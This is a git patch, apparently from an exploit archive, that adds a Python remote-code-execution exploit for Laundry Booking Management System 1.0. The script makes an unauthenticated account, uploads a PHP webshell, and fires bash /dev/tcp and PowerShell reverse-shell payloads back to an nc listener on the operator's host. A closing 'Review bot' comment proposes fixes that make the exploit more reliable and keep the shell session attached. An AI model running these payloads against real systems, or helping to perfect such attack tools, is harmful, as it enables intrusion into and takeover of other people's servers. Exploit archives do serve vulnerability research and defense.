From ebf638ee1a3c4150078f3f82ec5d5e732184a1a8 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Wed, 1 Dec 2021 05:02:07 +0000
Subject: [PATCH] DB: 2021-12-01

1 changes to exploits/shellcodes

Laundry Booking Management System 1.0 - Remote Code Execution (RCE)
---
 exploits/php/webapps/50556.py | 135 ++++++++++++++++++++++++++++++++++
 files_exploits.csv | 1 +
 2 files changed, 136 insertions(+)
 create mode 100755 exploits/php/webapps/50556.py

diff --git a/exploits/php/webapps/50556.py b/exploits/php/webapps/50556.py
new file mode 100755
index 000000000..c01411073
--- /dev/null
+++ b/exploits/php/webapps/50556.py
@@ -0,0 +1,135 @@ +# Exploit Title: Laundry Booking Management System 1.0 - Remote Code Execution (RCE) +# Date: 29/11/2021 +# Exploit Author: Pablo Santiago +# Vendor Homepage: https://www.sourcecodester.com/php/14400/laundry-booking-management-system-php-source-code.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/laundry_sourcecode.zip +# Version: 1.0 +# Tested on: Windows 7 and Ubuntu 21.10 + +# Vulnerability: Its possible create an user without being authenticated, +# in this request you can upload a simple webshell which will used to get a +# reverse shell + +import re, sys, argparse, requests, time, os +import subprocess, pyfiglet + +ascii_banner = pyfiglet.figlet_format("Laundry") +print(ascii_banner) +print(" Booking Management System\n") +print("----[Broken Access Control to RCE]----\n") + + +class Exploit: + + def __init__(self,target, shell_name,localhost,localport,os): + + self.target=target + self.shell_name=shell_name + self.localhost=localhost + self.localport=localport + self.LHL= '/'.join([localhost,localport]) + self.HPW= "'"+localhost+"'"+','+localport + self.os=os + self.session = requests.Session() + #self.http_proxy = "http://127.0.0.1:8080" + #self.https_proxy = "https://127.0.0.1:8080" + #self.proxies = {"http" : self.http_proxy, + # "https" : self.https_proxy} + + self.headers= {'Cookie': 'PHPSESSID= Broken Access Control'} + + def create_user(self): + + url = self.target+"/pages/save_user.php" + data = { + "fname":"bypass", + "email":"bypass@bypass.com", + "password":"password", + "group_id": "2", + + } + + #Creates user "bypass" and upload a simple webshell without +authentication + request = self.session.post(url, +data=data,headers=self.headers,files={"image":(self.shell_name ++'.php',"")}) + time.sleep(3) + if (request.status_code == 200): + print('[*] The user and webshell were created\n') + else: + print('Something was wront...!') + + def execute_shell(self): + if self.os == "linux": + 
time.sleep(3) + print("[*] Starting reverse shell\n") + subprocess.Popen(["nc","-nvlp", self.localport]) + time.sleep(3) + + #Use a payload in bash to get a reverse shell + payload = 'bash+-c+"bash+-i+>%26+/dev/tcp/'+self.LHL+'+0>%261"' + execute_command = +self.target+'/uploadImage/Profile/'+self.shell_name+'.php?cmd='+payload + + try: + request_rce = requests.get(execute_command) + print(request_rce.text) + + except requests.exceptions.ReadTimeout: + pass + + elif self.os == "windows": + time.sleep(3) + print("[*] Starting reverse shell\n") + subprocess.Popen(["nc","-nvlp", self.localport]) + time.sleep(3) + + #Use a payload in powershell to get a reverse shell + payload = +"""powershell+-nop+-c+"$client+%3d+New-Object+System.Net.Sockets.TCPClient("""+self.HPW+""")%3b$stream+%3d+$client.GetStream()%3b[byte[]]$bytes+%3d+0..65535|%25{0}%3bwhile(($i+%3d+$stream.Read($bytes,+0,+$bytes.Length))+-ne+0) +{%3b$data+%3d+(New-Object+-TypeName+System.Text.ASCIIEncoding).GetString($bytes,0,+$i)%3b$sendback+%3d+(iex+$data+2>%261+|+Out-String+)%3b$sendback2+%3d+$sendback+%2b+'PS+'+%2b+(pwd).Path+%2b+'>+'%3b$sendbyte+%3d+([text.encoding]%3a%3aASCII).GetBytes($sendback2)%3b$stream.Write($sendbyte,0,$sendbyte.Length)%3b$stream.Flush()}%3b$client.Close()""""" + execute_command = +self.target+'/uploadImage/Profile/'+self.shell_name+'.php?cmd='+payload + + + try: + request_rce = requests.get(execute_command) + print(request_rce.text) + + except requests.exceptions.ReadTimeout: + pass + + else: + print('Windows or linux') + + +def get_args(): + parser = argparse.ArgumentParser(description='Laundry Booking +Management System') + parser.add_argument('-t', '--target', dest="target", required=True, +action='store', help='Target url') + parser.add_argument('-s', '--shell_name', dest="shell_name", +required=True, action='store', help='shell_name') + parser.add_argument('-l', '--localhost', dest="localhost", +required=True, action='store', help='local host') + parser.add_argument('-p', 
'--localport', dest="localport", +required=True, action='store', help='local port') + parser.add_argument('-os', '--os', choices=['linux', 'windows'], +dest="os", required=True, action='store', help='linux,windows') + args = parser.parse_args() + return args + +args = get_args() +target = args.target +shell_name = args.shell_name +localhost = args.localhost +localport = args.localport + + +xp = Exploit(target, shell_name,localhost,localport,args.os) +xp.create_user() +xp.execute_shell() + +#Example software vulnerable installed in windows:python3 exploit.py -t http://IP/path -s rce -l 192.168.1.128 -p 443 -os windows +#Example software vulnerable installed in linux: python3 exploit.py -t http://IP/path -s rce -l 192.168.1.128 -p 443 -os linux \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 95bc3143d..f5ce15abe 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -44644,3 +44644,4 @@ id,file,description,date,author,type,platform,port 50553,exploits/multiple/webapps/50553.txt,"orangescrum 1.8.0 - 'Multiple' SQL Injection (Authenticated)",1970-01-01,"Hubert Wojciechowski",webapps,multiple, 50554,exploits/multiple/webapps/50554.txt,"orangescrum 1.8.0 - 'Multiple' Cross-Site Scripting (XSS) (Authenticated)",1970-01-01,"Hubert Wojciechowski",webapps,multiple, 50555,exploits/php/webapps/50555.txt,"opencart 3.0.3.8 - Sessjion Injection",1970-01-01,"Hubert Wojciechowski",webapps,php, +50556,exploits/php/webapps/50556.py,"Laundry Booking Management System 1.0 - Remote Code Execution (RCE)",1970-01-01,"Pablo Santiago",webapps,php,
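Review bot: The `except requests.exceptions.ReadTimeout: pass` handlers in both branches of `execute_shell` can never fire, because each `requests.get(execute_command)` is issued without a `timeout=`; if the target keeps the HTTP response open while the reverse shell runs (which a blocking `system()`-style webshell presumably does), the exploit hangs on that GET indefinitely rather than returning control to the `nc` listener it just spawned. Change both calls to `request_rce = requests.get(execute_command, timeout=10)` (tune the value to the target) so the handler actually does what its presence implies. The listener is also fire-and-forget — the `subprocess.Popen(["nc","-nvlp", self.localport])` handle is discarded and never waited on, so when the script returns `nc` is left as an orphan process; keeping the handle and calling `.wait()` at the end of `execute_shell` keeps the operator attached to the session. Separately, the `os` parameter of `Exploit.__init__` shadows the `os` module imported at the top of the file; renaming it to `target_os` (and `self.os` to `self.target_os`) avoids the confusion, even though the module itself is unused in the code shown here.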